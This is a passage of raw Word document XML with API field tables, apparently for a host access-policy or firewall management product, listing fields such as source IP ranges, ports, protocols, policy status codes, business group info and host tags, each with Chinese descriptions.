        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34E69340" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CABD5D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05CA0F1C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6732C936" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcIpRanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="225E05F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C17BD69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问者ip范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2BCF89A5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33B24DDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcAgentSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A61BC99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="728D24F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="511B6818" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53E05316" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE04C28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD67A37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A15D7A9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237551F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcIpName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66D52945" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A9D280A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="193ADC26" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52FF2192" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20B7BA34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436F2067" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E932902" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="021C5149" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="136708D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72CA8668" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6586A6CB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E991ADA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A7F0F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FD4106A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略状态,0：新建，1：待同步，2：已同步,3:删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="59136B5B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79B9B659" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64957728" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55091910" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08EA84EC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="590A5527" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>optUsername</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C71A3DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EA8484D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4643BD90" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27FA0822" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E16D53F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CFFA403" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="79719CD5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FCC192D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayDstIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43EEA159" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B0B08B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>目标IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A872D4F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169A9D81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displaySrcIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="449916BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4009FEF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>源IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30E574DD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EE218E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12E20A4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04B1B7D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DFCE4D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DC11501" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="234FB596" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F5F676" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="100A733F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E3A2A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CE3FAB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41165011" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否有操作权限，true：有权限，false：无权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BF3EDE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GroupInfo：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3336"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="29A67B2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7FADC0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD9122D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B9B2350" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03B6A6EA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D008EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31F31995" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5629267F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7381C426" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="112E0B25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E6E3D65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="563612F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统，1：linux，2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46B22D01" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="544ED7C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FB8850B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14D4E717" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35D61256" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C755C6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D678BFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0872C401" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FBC763E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="708A3B04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0206F720" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6043450A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父节点id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C10D854" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HostTagBO</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3DD2B19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D47E402" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A03043C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30C62DAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="507D2454" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F4D297" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093FBCAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D36202C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0049ED41" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BE79D87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tagName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F933D47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EA2A2BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DCD8103" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F1F79C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tagColor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="658EC238" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
